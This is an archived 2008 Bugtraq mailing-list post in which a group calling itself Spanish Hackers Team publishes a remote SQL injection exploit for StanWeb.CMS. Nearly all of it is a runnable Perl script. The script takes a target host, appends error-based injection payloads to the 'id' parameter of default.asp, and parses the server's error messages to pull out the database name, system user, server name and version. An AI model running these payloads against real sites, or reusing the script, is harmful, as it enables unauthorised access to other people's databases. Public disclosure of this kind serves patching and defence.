[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080517135017.26327.qmail@securityfocus.com>
Date: 17 May 2008 13:50:17 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
# --==+ StanWeb.CMS (default.asp id) Remote SQL Injection Exploit +==--
# --==+====================================================================================+==--
# [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
# [+] Info:
# [~] Software: StanWeb.CMS
# [~] Exploit: Remote SQL Injection [High]
# [~] Bug Found By: JosS | Jose Luis Góngora Fernández
# [~] Contact: sys-project[at]hotmail.com
# [~] Web: http://www.spanish-hackers.com
# [~] Vuln File: default.asp
# [+] Exploit:
#!/usr/bin/perl
# StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / EspSeC
# www.spanish-hackers.com
# in memory of rgod :D
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit");
system ("color 02");
}
}
#*************************** expl ******************************
&lw;
print "\t\t########################################################\n\n";
print "\t\t# StanWeb.CMS - Remote SQL Injection Exploit #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";
$host=$ARGV[0];
chop $host;
$host=$host."/default.asp?id=";
if(!$ARGV[0]) {
print "\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n";
print "[x] written by JosS - sys-project[at]hotmail.com\n";
print "[x] usage: perl $0 [host]\n";
print "[x] example: http://hostxx.com/web\n";
exit(1);
}
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');
for ($i=0;$i<=3;$i++)
{
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
{
if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{
print "db_name:\n";
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";
}
if ($comando[$i] eq "1+and+1=convert(int,system_user)")
{
print "system_user:\n";
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";
}
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")
{
print "servername:\n";
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";
}
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
{
print "version:\n";
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";
}
} # Cierre del if principal
} # cierre for
# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
# --==+ JosS +==--
# --==+====================================================================================+==--
#
Powered by blists - more mailing lists